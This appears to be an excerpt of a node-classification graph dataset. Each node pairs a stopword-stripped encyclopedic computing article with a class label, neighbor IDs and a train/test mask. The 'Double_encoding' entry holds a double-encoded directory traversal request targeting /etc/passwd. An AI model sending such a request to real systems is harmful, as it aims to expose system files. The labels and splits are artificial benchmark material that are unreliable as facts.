    "text": "CPU_card:cpu card cpu card printed circuit board pcb contains central processing unit cpu computer cpu cards specified cpu clock frequency bus type well features applications built card cpu cards include peripheral component interconnect pci cards modular pc cards industry standard architecture isa cards pci extensions instrumentation pxi cards embedded technology extended etx cards many others cpu cards often used expand memory speed bandwidth embedded applications existing computer system pc cards typically used expand system ’ embedded applications pc cards include modules audio video applications data communications embedded storage pxi cards used data acquisition control systems making suitable real-time measurement applications etx cards used industrial applications augment computer system ’ embedded applications etx cards contain functionality necessary run pc compact space cpu cards used augment existing computer backplanes typically isa pci connectors plugged backplane without additional configuration cpu cards use computer backplanes typically half-sized cpu card contains pc functionality communicates cards plugged backplane computer bus cpu cards may also called expansion cards expansion boards offer variety embedded applications modems wireless networking graphics video controllers raid controllers",
    "neighbors": [
      1776,
      8301,
      5368
    ],
    "mask": "None"
  },
  {
    "node_id": 3770,
    "label": 4,
    "text": "UDP_hole_punching:udp hole punching udp hole punching commonly used technique employed network address translation nat applications maintaining user datagram protocol udp packet streams traverse nat nat traversal techniques typically required client-to-client networking applications internet involving hosts connected private networks especially peer-to-peer direct client-to-client dcc voice internet protocol voip deployments udp hole punching establishes connectivity two hosts communicating across one network address translators typically third-party hosts public transit network used establish udp port states may used direct communications communicating hosts port state successfully established hosts communicating port state may maintained either normal communications traffic prolonged absence thereof keep-alive packets usually consisting empty udp packets packets minimal non-intrusive content udp hole punching method establishing bidirectional udp connections internet hosts private networks using network address translators technique applicable scenarios types nats nat operating characteristics standardized hosts network connectivity inside private network connected via nat internet typically use session traversal utilities nat stun method interactive connectivity establishment ice determine public address nat communications peers require process another host public network used establish port mapping udp port state assumed valid direct communication application hosts since udp state usually expires short periods time range tens seconds minutes udp port closed process udp hole punching employs transmission periodic keep-alive packets renewing life-time counters udp state machine nat udp hole punching work symmetric nat devices also known bi-directional nat tend found large corporate networks symmetric nat nat mapping associated connection well-known stun server restricted receiving data well-known server therefore nat mapping well-known server sees useful information endpoint somewhat elaborate approach hosts start sending using multiple attempts restricted cone nat first packet host blocked nat device record sent packet machine let packets coming ip address port number technique widely used peer-to-peer software voice internet protocol telephony also used assist establishment virtual private networks operating udp technique sometimes extended transmission control protocol tcp connections though less success tcp connection streams controlled host os application sequence numbers selected randomly thus nat device performs sequence-number checking consider packets associated existing connection drop let b two hosts private network n n two nat devices globally reachable ip addresses eip eip respectively public server well-known globally reachable ip address",
    "neighbors": [
      4229,
      10889,
      4490,
      6541,
      14,
      11413,
      10522,
      10924,
      7214,
      7859,
      2228,
      6964,
      8640,
      11073,
      3011,
      708,
      6351,
      3792,
      6991,
      7761,
      4435,
      6364,
      3676,
      5085,
      609,
      3428,
      3812,
      3813,
      9318,
      1908,
      5749,
      8308,
      9332
    ],
    "mask": "Test"
  },
  {
    "node_id": 3771,
    "label": 9,
    "text": "Net.Data:net.data net.data programming language ibm used largely database-backed web applications",
    "neighbors": [
      8262,
      6311,
      5450,
      8792,
      6797,
      5006,
      7983,
      9455,
      10040,
      3960,
      2901,
      9397,
      2168,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 3772,
    "label": 2,
    "text": "Night_Shift_(software):night shift software night shift built software feature ios macos introduced ios ios 9.3 macos macos sierra 10.12.4 feature changes color temperature display towards yellowish part color spectrum reduces blue light screen apple claims feature may help users better night sleep filtering blue wavelengths display feature similar functionality f.lux provides night shift feature compatible 64-bit ios devices running ios 9.3 macs 2012 later running macos sierra 10.12.4 feature turned settings ios system preferences macos toggled manually notification center macos control center ios feature enabled disabled siri ios macos feature set enabled sunset turn sunrise default turned custom schedule feature set enable sunset disable sunrise relies user approximate location determine time sunset sunrise user also customize intensity night shift settings ios system preferences macos",
    "neighbors": [
      10755,
      9732,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      7292,
      2686,
      6783,
      10878,
      5784,
      1177,
      3228,
      2207,
      11430,
      2735,
      3248,
      4283,
      7869,
      3286,
      9430,
      3293,
      4318,
      6884,
      9451,
      1772,
      7420,
      1290,
      3338,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      7496,
      4957,
      6495,
      9063,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      487,
      2023,
      7154
    ],
    "mask": "Train"
  },
  {
    "node_id": 3773,
    "label": 4,
    "text": "Off-site_data_protection:off-site data protection computing off-site data protection vaulting strategy sending critical data main location main site part disaster recovery plan data usually transported off-site using removable storage media magnetic tape optical storage data also sent electronically via remote backup service known electronic vaulting e-vaulting sending backups off-site ensures systems servers reloaded latest data event disaster accidental error system crash sending backups off-site also ensures copy pertinent data ’ stored on-site although organizations manage store off-site backups many choose backups managed stored third parties specialize commercial protection off-site data storage off-site data also known vaulting backups stored purpose-built vaults generally recognized standards type structure constitutes vault said commercial vaults typically fit three categories hybrid on-site off-site data vaulting sometimes known hybrid online backup involve combination local backup fast backup restore along off-site backup protection local disasters according liran eshel ceo ctera networks ensures recent data available locally event need recovery archived data needed much less often stored cloud hybrid online backup works storing data local disk backup captured high speed either backup software d2d2c disk disk cloud appliance encrypts transmits data service provider recent backups retained locally speed data recovery operations number cloud storage appliances market used backup target including appliances ctera networks nasuni storsimple twinstrata data protection statutes usually non-prescriptive within commercial arena data protected increasingly require active protection data united states federal entities specific requirements defined u.s. national institute standards technology nist nist documentation obtained http //csrc.nist.gov/publications/pubssps.html commercial agencies option using documents compliance requirements statutes mandate protection data",
    "neighbors": [
      7905,
      6565,
      3366,
      5004,
      5133,
      3757,
      9906,
      5780,
      8471,
      10265
    ],
    "mask": "Test"
  },
  {
    "node_id": 3774,
    "label": 4,
    "text": "Moti_Yung:moti yung mordechai m. moti yung israeli-american cryptographer computer scientist industrial research career yung earned ph.d. columbia university 1988 supervision zvi galil past worked ibm thomas j. watson research center vice president chief scientist certco director advanced authentication research rsa laboratories researcher snap inc. currently research scientist google parallel work industry also held adjunct visiting faculty appointments columbia advised ph.d. students including gödel prize winner matthew k. franklin jonathan katz 1996 adam l. young yung coined term cryptovirology denote use cryptography attack weapon via computer viruses malware contrast traditional protective role particular described first instances ransomware using public-key cryptography young yung introduced notion kleptography show cryptography could used attack host cryptosystems malicious resulting system embedded cryptologic tool resists reverse-engineering detected interacting host cryptosystem attack ransomware also uses internal cryptography attack tool break another cryptographic system snowden affair nist believed mounted first kleptographic attack american federal information processing standard detailing dual ec drbg essentially exploiting repeated discrete logarithm based kleptogram introduced young yung light snowden revelations yung worked detecting correcting cryptosystems subverted implementation work kleptography argument cryptographic systems devices given external body black boxes clipper chip capstone program suggested united states government tried control use cryptography 1990s known first stage crypto wars 1995 yair frankel yung implemented published direct attack clipper chip showing key escrow device tracking authenticating capability namely leaf one device attached messages coming another device message actually decrypted mechanism thus bypassing escrow real time cryptovirology also natural tool crypto wars defined broadly young yung later designed software-only escrow encryption attempt get potential system possessed many desired properties without tamper-proof hardware inherent third party access requirement remains vulnerability nevertheless.. yung made numerous contributions several areas foundations basic cryptographic systems protocols well areas applied cryptography information security also worked theoretical computer science distributed network algorithms yung worked moni naor designing first public key cryptosystems secure chosen-ciphertext attack jonathan katz chosen ciphertext security symmetric encryption schemes via authenticated encryption also worked naor design first secure digital signature schemes based trapdoor functions employing basic primitive universal one-way hash functions signature schemes yung worked early robust multi-party secure schemes via notion shares shares area secure computation protocols 1980s well notion multi secret compact/ batched secret sharing idea also worked rafail ostrovsky basic notion mobile adversary multi-party protocols proactive security fault-tolerance adversaries underlying technique proactive secret sharing yung also worked zero-knowledge proofs commitment schemes particular notion interactive hashing unconditionally hiding commitments general complexity assumptions functional commitment various coauthors yung also worked special goal protocols secure computing e.g set intersection election digital cash auctions threshold cryptosystems fully homomorphic encryption schemes logarithmic depth circuits yung work basic primitives needed communication networks include first efficient password-based authenticated key exchange protocol shown secure without idealized random oracle model assumptions work early 1990 ibm coauthors dealt authentication authenticated key exchange observing cryptographic protocol real networks run concurrently attack suggested iso protocols time led revised modeling problem cryptography zvi galil stuart haber yung predicted mid-1980s large scale networks due scale limitations employ public key technology server public-key certificates interactive protocols idea viewed intellectual predecessor way prevalent version transport layer security implemented mid-1990s using interactive protocols employing ssl certificates servers regarding authentication factors users present systems sign systems traditional factors include knowledge factors ownership factors inherence factors yung coauthors also studied factors available users modern computing environments richer context e.g social relationships area information-theoretic security yung coauthors investigated multicast key pre-distribution system perfectly secure message transmission multi-user authentication codes also coding theory based work includes relating reed–solomon error correction codes cryptographic hardness led interleaving decoding work codes yung coauthored studies methodological framework conducting analyzing side channel attacks also worked early remote attestation software secure run time user running software may try subvert system addition scientific contributions basic applied research yung worked projects industry",
    "neighbors": [
      1797,
      2580,
      939,
      177,
      1970,
      7739,
      4546,
      2558,
      9550,
      4435,
      1368,
      7515,
      2012,
      2154,
      107,
      1783,
      3323,
      5373,
      10110
    ],
    "mask": "Test"
  },
  {
    "node_id": 3775,
    "label": 4,
    "text": "Uday_Ali_Pabrai:uday ali pabrai uday ali pabrai indian-american entrepreneur based irvine california chairman chief executive officer ecfirst compliance cybersecurity business headquartered waukee iowa pabrai globally renowned cyber security compliance expert featured keynote speaker moderated cybersecurity events international conferences mr. pabrai led numerous cybersecurity engagements worldwide iso 27001 pci dss hitrust nist hipaa/hitech highly sought professional successfully delivered solutions u.s. government agencies firms healthcare systems legal organizations worldwide served interim ciso large health system usa pabrai created several certification programs area information security worked manager security team fermi national accelerator laboratory fermi lab u.s. department energy featured presenter conferences worldwide including fbi infragard hcfa issa isaca isc ² himss hipaa summit comdex microsoft tech forum indiaexpo naseba asis security imprivata healthcare conference healthcare congress pabrai established world first certification program comprehensively addresses global compliance standards regulations area information security certified security compliance specialist cscs also successfully developed leading certification credentials world including ciw 125,000 certificates issued security certified program scp developed certified cyber security architect ccsa program well hitrust cybersecurity strategy workshop previously founded net guru technologies ngt 1994 nasdaq-based firm acquired ngt 1997 launched career 1983 schlumberger leading oilfield services provider dubai associate accountant 1987 started career united states fermi national accelerator laboratory fermilab u.s. department energy facility mr. pabrai presented u.s. defense intelligence agency dia naval surface warfare center mr. pabrai received b.s computer engineering clemson university south carolina received msee degree illinois institute technology iit credentials include security+ ccsfp hitrust cissp issap issmp published hundreds articles regulatory compliance information security published numerous e-security articles leading magazines certification ebusiness advisor computing channel access control security systems covering topics risk management hipaa pki smart cards biometrics e-business disruption ________________",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3776,
    "label": 4,
    "text": "Trust_metric:trust metric psychology sociology trust metric measurement degree one social actor individual group trusts another social actor trust metrics may abstracted manner implemented computers making interest study engineering virtual communities friendster livejournal trust escapes simple measurement meaning subjective universally reliable metrics fact mental process unavailable instruments strong argument use simplistic metrics measure trust due complexity process 'embeddedness trust makes impossible isolate trust related factors generally agreed set properties make particular trust metric better others metric designed serve different purposes e.g provides certain classification scheme trust metrics two groups trust metrics identified trust metrics enable trust modelling reasoning trust closely related reputation systems simple forms binary trust metrics found e.g pgp first commercial forms trust metrics computer software applications like ebay feedback rating slashdot introduced notion karma earned activities perceived promote group effectiveness approach influential later virtual communities empirical metrics capture value trust exploring behavior introspection people determine perceived expressed level trust methods combine theoretical background determining measure defined set questions statistical processing results willingness cooperate well actual cooperation commonly used demonstrate measure trust actual value level trust and/or trustworthiness assessed difference observed hypothetical behaviors i.e would anticipated absence cooperation surveys capture level trust means observations introspection without engaging experiments respondents usually providing answers set questions statements responses e.g structured according likert scale differentiating factors underlying theoretical background contextual relevance one earliest surveys mccroskey scales used determine authoritativeness competence character trustworthiness speakers rempel trust scale rotter scale quite popular determining level interpersonal trust different settings organizational trust inventory oti example exhaustive theory-driven survey used determine level trust within organisation particular research area specific survey developed example interdisciplinary model trust verified using survey uses survey establish relationship design elements web site perceived trustworthiness another empirical method measure trust engage participants experiments treating outcome experiments estimates trust several games game-like scenarios tried estimate trust confidence monetary terms see interesting overview games trust designed way nash equilibrium differ pareto optimum player alone maximize utility altering selfish strategy without cooperation cooperating partners benefit trust therefore estimated basis monetary gain attributable cooperation original 'game trust described abstracted investment game investor broker game played several times randomly chosen players pairs know yielding different results several variants game exist focusing different aspects trust observable behaviour example rules game reversed called game distrust declaratory phase introduced rules presented variety ways altering perception participants interesting games e.g binary-choice trust games gift-exchange game cooperative trust games various forms social games specifically prisoners dilemma popularly used link trust economic utility demonstrate rationality behind reciprocity multi-player games different forms close market simulations exist formal metrics focus facilitating trust modelling specifically large scale models represent trust abstract system e.g social network web trust consequently may provide weaker insight psychology trust particulars empirical data collection formal metrics tend strong foundations algebra probability logic widely recognised way attribute value level trust representation 'trust value claiming certain advantages disadvantages systems assume binary values use fixed scale confidence range -100 +100 excluding zero 0 1 −1 +1 confidence discrete continuous one-dimensional many dimensions metrics use ordered set values without attempting convert particular numerical range e.g see detailed overview also disagreement semantics values disagreement regarding attribution values levels trust specifically visible comes meaning zero negative values example zero may indicate either lack trust distrust lack information deep distrust negative values allowed usually indicate distrust doubt whether distrust simply trust negative sign phenomenon subjective probability focuses trustor self-assessment trust trustee assessment framed anticipation regarding future behaviour trustee expressed terms probability probability subjective specific given trustor assessment situation information available etc situation trustors may different level subjective probability subjective probability creates valuable link formalisation empirical experimentation formally subjective probability benefit available tools probability statistics empirically subjective probability measured one-side bets assuming potential gain fixed amount person bets used estimate subjective probability transaction logic uncertain probabilities subjective logic introduced josang uncertain probabilities called subjective opinions elegant concept combines probability distribution uncertainty opinion trust viewed distribution probability distributions distribution qualified associated uncertainty foundation trust representation opinion evidence confidence trust represented four-tuple trust distrust uncertainty base rate trust distrust uncertainty must add one hence dependent additivity subjective logic example computational trust uncertainty inherently embedded calculation process visible output one e.g possible use similar quadruplet trust distrust unknown ignorance express value confidence long appropriate operations defined despite sophistication subjective opinion representation particular value four-tuple related trust easily derived series binary opinions particular actor event thus providing strong link formal metric empirically observable behaviour finally certaintrust certainlogic share common representation equivalent subjective opinions based three independent parameters named 'average rating 'certainty 'initial expectation hence bijective mapping certaintrust-triplet four-tuple subjective opinions fuzzy systems trust metrics link natural language expressions meaningful numerical analysis application fuzzy logic trust studied context peer peer networks improve peer rating also grid computing demonstrated fuzzy logic allows solve security issues reliable efficient manner set properties satisfied trust metric vary depending application area following list typical properties transitivity highly desired property trust metric situations trusts b b trusts c transitivity concerns extent trusts c. without transitivity trust metrics unlikely used reason trust complex relationships intuition behind transitivity follows everyday experience 'friends friend foaf foundation social networks however attempt attribute exact formal semantics transitivity reveals problems related notion trust scope context example defines conditions limited transitivity trust distinguishing direct trust referral trust similarly shows simple trust transitivity always hold based information advogato model consequently proposed new trust metrics simple holistic approach transitivity characteristic social networks foaf advogato follows everyday intuition assumes trust trustworthiness apply whole person regardless particular trust scope context one trusted friend one also trusted recommend endorse another friend therefore transitivity semantically valid without constraints natural consequence approach thorough approach distinguishes different scopes/contexts trust allow transitivity contexts semantically incompatible inappropriate contextual approach may instance distinguish trust particular competence trust honesty trust ability formulate valid opinion trust ability provide reliable advice sources information contextual approach often used trust-based service composition understanding trust contextual scope foundation collaborative filtering formal trust metric useful define set operations values trust way result operations produce values trust usually least two elementary operators considered exact semantics operators specific metric even within one representation still possibility variety semantic interpretations example representation logic uncertain probabilities trust fusion operations interpreted applying different rules cumulative fusion averaging fusion constraint fusion dempster rule yager modified dempster rule inagaki unified combination rule zhang centre combination rule dubois prade disjunctive consensus rule etc. interpretations leads different results depending assumptions trust fusion particular situatation modelled see detailed discussions growing size networks trust make scalability another desired property meaning computationally feasible calculate metric large networks scalability usually puts two requirements metric attack resistance important non-functional property trust metrics reflects ability overly influenced agents try manipulate trust metric participate bad faith i.e aim abuse presumption trust free software developer resource advogato based novel approach attack-resistant trust metrics raph levien levien observed google pagerank algorithm understood attack resistant trust metric rather similar behind advogato",
    "neighbors": [
      474,
      1709,
      503
    ],
    "mask": "Test"
  },
  {
    "node_id": 3777,
    "label": 4,
    "text": "Shadowsocks:shadowsocks shadowsocks free open-source encrypted proxy project widely used mainland china circumvent internet censorship created 2012 chinese programmer named clowwindy multiple implementations protocol made available since typically client software open socks5 proxy machine running internet traffic directed towards similarly ssh tunnel unlike ssh tunnel shadowsocks also proxy udp traffic 22 august 2015 clowwindy announced github thread contacted police could longer maintain project code project subsequently branched removal notice three days later 25 august another proxy application goagent also github repository removed removal projects met media attention news outlets speculating possible connection takedowns ddos targeting github happened several days later danny o'brien electronic frontier foundation published statement matter despite takedown collaborators project continued development project original python implementation still installed pip package manager contents github repository removed server implementations include one go c using event loop library c++ qt gui perl go perl implementations updated regularly may abandoned server implementations listed also support operating client mode also client-only implementations available windows shadowsocks-win macos shadowsocksx-ng android shadowsocks-android ios wingy many clients including shadowsocks-win shadowsocks-android support redirecting system traffic shadowsocks applications explicitly configured allowing shadowsocks used similarly vpn application n't support proxy servers proxifier used redirect application shadowsocks client proxifiers proxycap support shadowsocks directly thus avoiding need shadowsocks client net :shadowsocks name perl implementation shadowsocks protocol client server available cpan shadowsocksr fork original project claimed superior terms security stability upon release found violate general public license source code c client available also criticized solution alleged security issues source project shadowsocks currently development shadowsocksr stopped",
    "neighbors": [
      4224,
      5254,
      10889,
      138,
      6797,
      9722,
      8211,
      1692,
      5405,
      3742,
      9117,
      3625,
      4268,
      7983,
      7859,
      2228,
      8630,
      823,
      8640,
      2884,
      3781,
      5959,
      8265,
      11468,
      7376,
      6993,
      11221,
      11606,
      2136,
      9048,
      6490,
      5084,
      2661,
      9318,
      6119,
      8039,
      2281,
      8554,
      9193,
      5612,
      10341,
      11248,
      4725,
      5749,
      3322,
      2045,
      5887
    ],
    "mask": "None"
  },
  {
    "node_id": 3778,
    "label": 4,
    "text": "POSITIF_(project):positif project positif project aimed creating framework tools policy-based protection networked systems applications launched february 1 2004 ended january 31 2007 following participants took part project",
    "neighbors": [
      3609
    ],
    "mask": "Test"
  },
  {
    "node_id": 3779,
    "label": 3,
    "text": "Swap_Magic:swap magic swap magic specialized playstation 2 game disc used tricking console reading non-retail burned game discs homebrew software games outside console region software existed since least mid-2003 several different versions disc developed swap magic related mods magic switch swap tool used allow user swap discs without system aware notable methods modchip due fact void ps2 warranty swap magic disc allows user boot software allows system read discs would normally refuse lack burst cutting area discs burned ordinary dvd drive opposed regular retail discs stamped pressed en masse user removes disc installing small modifications prevent system detecting drive opened replaces another disc started software also allows homebrew software run memory card usb flash drive swap magic non-sony-made playstation 2 bootable discs use method growing splicing stampers original playstation 2 discs method growing stamper original game disc joining new stamper program data essence resulting discs contain portion original disc datel first company outside sony make bootable playstation 2 disc researched protection produced discs protection on-site mastering facility ifpi dvd found inner ring underside data side disc start data mirror part disc hub contain text specified time mastering usually consists string ifpi followed code describing mastering system used followed text product description finally bar code swap magic v1 released compatible v12 slim ps2 swap magic v2 released sony slightly changed design console v13-15 models slim ps2 swap magic v1 work models version 2 widely criticized required user open console therefore voided warranty company responded criticism releasing swap magic v3 require opening console swap magic v3.8 also known coder released adds ability loading action replay cheats booted game however users complained coder compatibility issues well known bugs example games work v3.6 work coder consequently v3.6 remains popular version swap magic",
    "neighbors": [
      11584,
      10316,
      9477
    ],
    "mask": "Test"
  },
  {
    "node_id": 3780,
    "label": 4,
    "text": "IEEE_802.10:ieee 802.10 ieee 802.10 former standard security functions could used local area networks metropolitan area networks based ieee 802 protocols 802.10 specifies security association management key management well access control data confidentiality data integrity ieee 802.10 standards withdrawn january 2004 working group ieee 802 currently active security wireless networks standardized 802.11i cisco inter-switch link isl protocol supporting vlans ethernet similar lan technologies based ieee 802.10 application 802.10 largely replaced ieee 802.1q standard developed 8 parts parts b e f g h incorporated ieee standard 802.10-1998",
    "neighbors": [
      8708,
      7045,
      7049,
      5270,
      5671,
      6187,
      4396,
      2737,
      3762,
      434,
      6834,
      11321,
      5439,
      10332,
      4581,
      5863,
      2932,
      11125,
      6904,
      8828,
      3838
    ],
    "mask": "Test"
  },
  {
    "node_id": 3781,
    "label": 4,
    "text": "Telex_(anti-censorship_system):telex anti-censorship system telex research anti-censorship system would allow users circumvent censor without alerting censor act circumvention ready real users proof-of-concept mock system exists telex complements services like tor anonymity network placing telex stations network infrastructure free countries client create tls tunnel indistinguishable allowed traffic way firewalls censored countries neither able detect block access specific parts internet assuming allow access",
    "neighbors": [
      4224,
      3777,
      8640,
      2884,
      2661,
      5254,
      8998,
      10341,
      3625,
      138,
      9193,
      4876,
      4725,
      5749,
      8630,
      1692,
      9117,
      5887
    ],
    "mask": "None"
  },
  {
    "node_id": 3782,
    "label": 8,
    "text": "Google_Website_Optimizer:google website optimizer google website optimizer free website optimization tool helped online marketers webmasters increase visitor conversion rates overall visitor satisfaction continually testing different combinations website content google website optimizer could test element existed html code page including calls action fonts headlines point action assurances product copy product images product reviews forms allowed webmasters test alternative versions entire page called a/b testing — test multiple combinations page elements headings images body copy known multivariate testing could used multiple stage conversion funnel 1 june 2012 google announced gwo separate product would retired 1 august 2012 functionality would integrated google analytics google analytics content experiments",
    "neighbors": [
      4096,
      1409,
      4995,
      5892,
      8455,
      7816,
      9610,
      5262,
      8719,
      3600,
      6800,
      5522,
      1427,
      5524,
      7700,
      10645,
      11408,
      10009,
      8858,
      1435,
      9244,
      10393,
      798,
      10525,
      288,
      7841,
      2978,
      4901,
      1959,
      3499,
      7595,
      10284,
      3633,
      1203,
      5431,
      2875,
      10045,
      7359,
      196,
      3269,
      11590,
      4167,
      11592,
      4683,
      4044,
      10445,
      9039,
      3664,
      3409,
      4048,
      3795,
      11343,
      1240,
      7548,
      8285,
      8413,
      6367,
      9949,
      2658,
      6632,
      5483,
      236,
      5100,
      9712,
      9970,
      8821,
      7926,
      119,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 3783,
    "label": 3,
    "text": "Socket_754:socket 754 socket 754 cpu socket originally developed amd supersede athlon xp platform socket 462 also referred socket socket 754 first socket developed amd support new consumer version 64 bit microprocessor family known amd64 socket 754 original socket amd athlon 64 desktop processors due introduction newer socket layouts i.e socket 939 socket 940 socket am2 socket 754 became budget-minded socket use amd athlon 64 sempron processors differs socket 939 several areas although amd promoted socket 754 budget platform desktop encouraged mid- high-end users use newer platforms socket 754 remained time amd high-end solution mobile applications e.g hp zv6000 series however socket s1 released superseded socket 754 mobile cpu segment support dual-core cpus ddr2 sdram first processors using socket 754 came market second half 2003 socket 754 phased favor socket 939 desktops low sales socket remained use laptops replaced s1 2006",
    "neighbors": [
      3586,
      8322,
      3588,
      8452,
      9475,
      3464,
      4872,
      7058,
      10260,
      4246,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      4451,
      5859,
      1260,
      5356,
      7788,
      7151,
      1651
    ],
    "mask": "None"
  },
  {
    "node_id": 3784,
    "label": 7,
    "text": "Multi-master_replication:multi-master replication multi-master replication method database replication allows data stored group computers updated member group members responsive client data queries multi-master replication system responsible propagating data modifications made member rest group resolving conflicts might arise concurrent changes made different members multi-master replication contrasted master-slave replication single member group designated master given piece data node allowed modify data item members wishing modify data item must first contact master node allowing single master makes easier achieve consistency among members group less flexible multi-master replication multi-master replication also contrasted failover clustering passive slave servers replicating master data order prepare takeover event master stops functioning master server active client interaction primary purposes multi-master replication increased availability faster server response time many directory servers based ldap implement multi-master replication one prevalent multi-master replication implementations directory servers microsoft active directory within active directory objects updated one domain controller replicated domain controllers multi-master replication required domain controllers replicate would cause excessive network traffic large active directory deployments instead domain controllers complex update pattern ensures servers updated timely fashion without excessive replication traffic active directory needs however better served flexible single master operation ca directory supports multi-master replication opends successor product opendj implemented multi-master since version 1.0 opends/opendj multi-master replication asynchronous uses log publish-subscribe mechanism allows scaling large number nodes opends/opendj replication conflict resolution entry attribute level opends/opendj replication used wide area network widely used open source ldap server implements multi-master replication since version 2.4 october 2007 apache couchdb uses simple http-based multi-master replication system built use append data-store use multiversion concurrency control mvcc document contains revision id every record stores evolutionary timeline previous revision ids leading itself—which provides foundation couchdb mvcc system additionally keeps by-sequence index entire database replication process copies last revision document previous revisions source database copied destination database couchdb replicator acts simple http client acting source target database compares current sequence ids database calculates revision differences makes necessary changes target based found history source database bi-directional replication result merely another replication source target values swapped arangodb native multi-model database system using multi-master replication clusters arangodb use cp master/master model single point failure cluster encounters network partition arangodb prefers maintain internal consistency availability clients experience view database regardless node connect cluster continues serve requests even one machine fails cloudant distributed database system uses largely http api apache couchdb exposes ability replicate using multiversion concurrency control mvcc cloudant databases replicate internally nodes within cloudant clusters use multi-master replication stay sync provide high availability api consumers extremedb cluster clustering sub-system mcobject extremedb embedded database product family maintains database consistency across multiple hardware nodes replicating transactions synchronous manner two-phase commit important characteristic extremedb cluster transaction replication contrast log file-based sql statement-based replication schemes may may guarantee success failure entire transactions accordingly extremedb cluster acid compliant system base eventual consistency query executed cluster node return result executed cluster node database clusters implement multi-master replication using one two methods asynchronous multi-master replication commits data changes deferred transaction queue periodically processed databases cluster synchronous multi-master replication uses oracle two phase commit functionality ensure databases cluster consistent dataset microsoft sql provides multi-master replication peer-to-peer replication provides scale-out high-availability solution maintaining copies data across multiple nodes built foundation transactional replication peer-to-peer replication propagates transactionally consistent changes near real-time basic level possible achieve multi-master replication scheme beginning since mysql version 3.23 circular replication departing mariadb mysql ship replication support different nuances terms direct support mariadb natively supports multi-master replication since version 10.0 conflict resolution supported master must contain different databases mysql named multi-source available since version 5.7.6 mysql mysql group replication plugin virtual synchronous multi master conflict handling distributed recovery released 5.7.17 cluster projects mysql cluster supports conflict detection resolution multiple masters since version 6.3 true multi-master capability mysql server also external project galera cluster created codership provides true multi-master capability based fork innodb storage engine custom replication plug-ins replication synchronous conflict possible percona xtradb cluster also combination galera replication library mysql supporting multi master various options synchronous multi-master replication exist postgres-xl available mozilla public license postgresxc known postgres-x2 available license postgresql examples note pgcluster project abandoned 2007 replication documentation postgresql categorises different types replication available various options exist distributed multi-master including bucardo rubyrep bdr bi-directional replication bdr aimed eventual inclusion postgresql core benchmarked demonstrating significantly enhanced performance earlier options bdr includes replication data writes dml well changes data definition ddl global sequences bdr nodes may upgraded online version 0.9 onwards 2ndquadrant developed bdr continuously since 2012 system used production since 2014 latest version bdr 3.6 provides column-level conflict detection crdts eager replication multi-node query consistency many features within ingres replicator objects updated one ingres server replicated servers whether local remote multi-master replication one server fails client connections re-directed another server required ingres servers environment replicate could cause excessive network traffic large implementations instead ingres replicator allows appropriate data replicated appropriate servers without excessive replication traffic means servers environment serve failover candidates servers meet requirements managing subset columns tables departmental solution subset rows geographical region one-way replication reporting server event source target network failure data integrity enforced two-phase commit protocol ensuring either whole transaction replicated none addition ingres replicator operate rdbms ’ multiple vendors connect",
    "neighbors": [
      8195,
      270,
      11030,
      1049,
      929,
      39,
      5546,
      1579,
      5677,
      9389,
      10048,
      6850,
      11203,
      2901,
      3927,
      8539,
      9828,
      8683,
      7022,
      6769,
      7409,
      6651,
      6780,
      4861,
      9471
    ],
    "mask": "Train"
  },
  {
    "node_id": 3785,
    "label": 4,
    "text": "Double_encoding:double encoding double encoding attack technique used bypass security mechanisms decode data used masquerade directory traversal attack cross-site scripting xss attack double encoding works encoding character want put really decrypts message input illegal characters codice_1 uri encoded becomes codice_2 double uri encoded becomes codice_3 get /download.php file= 252fetc 252fpasswd",
    "neighbors": [
      10959,
      4198,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 3786,
    "label": 4,
    "text": "Phillip_Porras:phillip porras phillip a. porras computer scientist security researcher known work combating conficker worm porras leads internet security group sri international computer science laboratory previously manager trusted computer systems department aerospace corporation porras holds 12 u.s. patents named sri fellow 2013 porras attended university california irvine porras author patents involved 2008 case sri international inc. v. internet security systems inc.. conficker worm initial attack porras running honeypot one first security researchers notice part conficker cabal helped combat worm porras team sri published extensive analysis worm 2010 porras co-author blade collaboration sri georgia tech researchers designed prevent drive-by download malware attacks porras named sri fellow 2013 long-term work information security malware analysis recent research openflow",
    "neighbors": [
      9256,
      5373,
      3555,
      4275
    ],
    "mask": "Test"
  },
  {
    "node_id": 3787,
    "label": 3,
    "text": "Ballblazer:ballblazer ballblazer 1984 futuristic sports game created lucasfilm games originally released atari 8-bit family ported atari 5200 apple ii zx spectrum amstrad cpc commodore 64 msx later atari 7800 nintendo famicom game called ballblaster development pirated versions game went name well principal creator programmer ballblazer david levine 1990 lucasarts rainbow arts released remake follow-up game called masterblazer game released amiga atari st ms-dos march 31 1997 remake original titled ballblazer champions released sony playstation ballblazer simple one-on-one sports-style game bearing similarities basketball soccer side represented craft called rotofoil controlled either human player computer-controlled droid ten levels difficulty game allows human vs. human human vs. droid droid vs. droid matches basic objective game score points either firing carrying floating ball opponent goal game takes place flat checkerboard playfield player half screen presented first-person perspective player gain possession ball simply running point held force field front craft opponent attempt knock ball away player using fire button player possession ball also fire ball toward goal player possession ball rotofoil automatically turns 90-degree intervals face ball possessing ball turns player toward opponent goal goalposts move side side end playfield goals scored goal becomes narrower pushing ball goal scores one point firing ball posts close range scores two points successfully scoring long range goalposts visible scores three points maximum number total points two players ten meaning points scored would take combined total ten cause opponent score reduced amount resulting kind tug war scoring system game ends either player successfully scores ten points timer runs time runs score tied game goes sudden death first player score wins ballblazer theme music called song grid heard matches algorithmically generated technique designed lucasfilm games team leader peter langston called riffology lead melody assembled predefined set 32 eight-note melody fragments riffs put together randomly algorithm also makes choices several parameters including fast play riff loud play omit elide notes insert rhythmic break melody accompanied bassline drums chords also assembled fly simplified version approach effect music plays forever without repeating without straying far original theme langston experienced jazz rock folk musician said ballblazer music one 